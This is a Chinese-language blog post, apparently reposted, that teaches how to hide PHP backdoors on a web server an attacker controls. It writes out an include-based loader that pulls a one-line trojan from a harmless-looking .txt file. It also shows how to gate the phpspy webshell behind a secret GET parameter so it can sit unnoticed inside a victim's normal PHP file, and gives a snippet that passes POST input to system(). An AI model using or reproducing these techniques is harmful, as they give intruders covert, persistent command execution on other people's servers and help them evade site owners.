PHP后门隐藏

首先建立一PHP文件test.php 文件内容为: ?php $test=$_GETtest; @include test/.$test; ? Txt文件一般都是说明文件，所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://loca

首先建立一PHP文件test.php 文件内容为:
　　

　　$test=$_GET['test'];

　　@include 'test/'.$test;

　　?> 　　

　　Txt文件一般都是说明文件，所以我们把一句话木马放到目录的说明文件里就OK了。随便建立一个TXT文件t.txt。我们把一句话木马粘贴到 t.txt文件里。然后访问 http://localhost/test/test.php?test=../t.txt 如果你看到t.txt的内容就证明Ok了， 然后把在lanker微型PHP后门客户端木马地址添入 http://localhost/test/test.php?test=../t.txt 密码里添入cmd就可以了，执行返回的结果都可以看到。 　　

方法2现在的webshell是越来越流行了，连php的后门也追上来了，主要的有angel的phpspy和 lanker的一句话后门！所以现在最主要的是怎么隐蔽我们的后门，想必看完我的文章大家都有自己各自的想法了。其实lanker的一句话后门确实很强大，但是要用户使用客户端的话会带来一些不必要的麻烦，虽然可以使程序没有记录，（POST没记录的哦）但是对于一般的站点这其实并不是很重要。有没与想过把phpspy插到一个文件里去呢？没有想过吗？呵呵，跟我来，我们用记事本打开phspy就好了，搜索登录入口四个字。 在

function loginpage() { ?>
后面加上

if ($ _ GET[name] == wrsky) { ?>
再在

前面面加上

} ?>

现在你可以把这一个phpspy都写到对方的某个正常的php文件里，直接浏览是看不出问题的喔，我们要登录的时候就直接在文件名后面加上?name= wrsky才可以看到 当然你也可以改成别的，只要替代上面 代码里的name和wrsky就可以的，相信自己动手你会觉得收获很大的。如果你要自己改写一些简单的代码而你又不会php的话，这里就有样东西要介绍给你哦~php后门插入器，呵呵，你可以在http://www.wrsky.com 火狐下载到它~~ 我们来看看怎么使用这个 工具 。先看看这个程序的样子。 呵呵~红色的喔，粉PP吧~~我们来测试一下，我在这里提供一段 代码

执行CMD命令

想执行的命令: > 系统命令>

if($ _ POST[action] == run){ @system($ _ POST[cmd]); } ?>

这段 代码是执行cmd命令的，我们利用插入 工具 进行插入看看！ 没插入前的样子我的设置为参数名为name，参数值为wrsky。插入文件我用了相对路径./ceshi.php 大家可以参考我插入的设置。因为程序和要插入的文件在同目录所以我写了./ceshi.php当然了，你也可以写成 /home/imaboy/bk.php（因为这是 linux 系统） 显示写入文件成功，我们开始连接咱的木马，以为我用的参数的name，值是wrsky，所以连接方式为 木马 所在地址?name=wrsky 大家可以看到，在输入后面的参数后运行完全正常，而且不易被发现喔，很可能被带到另外一台主机上去喔 。 ，
呵呵，只要想一点，你们肯定还会有更好的办法的！
Tags - php , 后门

原文地址：PHP后门隐藏, 感谢原作者分享。